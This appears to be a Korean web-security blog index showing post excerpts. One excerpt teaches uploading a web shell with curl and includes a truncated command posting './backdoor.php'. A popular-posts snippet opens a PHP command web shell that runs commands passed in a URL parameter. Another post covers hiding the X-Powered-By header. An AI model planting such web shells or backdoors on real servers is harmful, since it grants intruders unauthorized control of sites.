2017. 6. 5.

2017. 6. 4.

[웹 취약점] CURL 명령어를 이용한 웹 쉘 업로드

,

curl 명령어는 리눅스에서 http 메시지를 시스템상에서 요청하여 결과를 확인하는 명령어이다 사용 예) 1) POST 메소드 사용 shell> curl -d "req=12345" "http://111.111.111.111:80/service.jsp (curl -d 옵션 "요청내용(파라미터 등)" URL) 2) GET 메소드 사용 shell> curl "http://111.111.111.111:80/service.jsp?req=1234" 기타 옵션 -i 는 결과에서 header 와 body 표시 -l 는 결과에서 header 만 표시 3) 리눅스 curl 명령어를 이용하여 백도어 파일을 사이트에 업로드하는 명령어 curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php"...

Continue reading

2017. 6. 1.

[트러블슈팅] X-Powered-By 헤더 제거 및 서버 이름 변경 방법

, , ,

일반적으로 response header에 X-Powered-By:servlet/2.5 jsp/2.1 와 같이 정보가 노출되는 경우가 있다. JBOSS 와 웹로직 각각 다음의 블로그에서 활용하면 된다. http://opennaru.tistory.com/76 // JBOSS 의 경우 http://nf.still.pe.kr/2013/05/blog-post.html // 웹로직의 경...

Continue reading

피드 구독하기: 글 ( Atom )

Popular Posts

  • 간단 웹쉘 jsp
    /* PHP Version URL CMD WebShell           */ /* 사용법 : hxxp://URL/cmd.php?cmd=명령어 */ <?         echo "                 <FORM ACTIO...
  • [웹 취약점] http method 확인하기 with metasploit, Curl, Nikto, Nmap, Netcat
    프록시 도구를 이용하여 서버에 OPTIONS 메소드를 전달하면 지원하는 메소드를 확인 할 수 있다. 그런데 간혹 버프 OPTIONS 메소드로는 확인되지 않는데 response 헤더값에 allowed method 라고 표시되는 경우가 있다. 때문에 보...

Recent Posts

Powered by Blogger.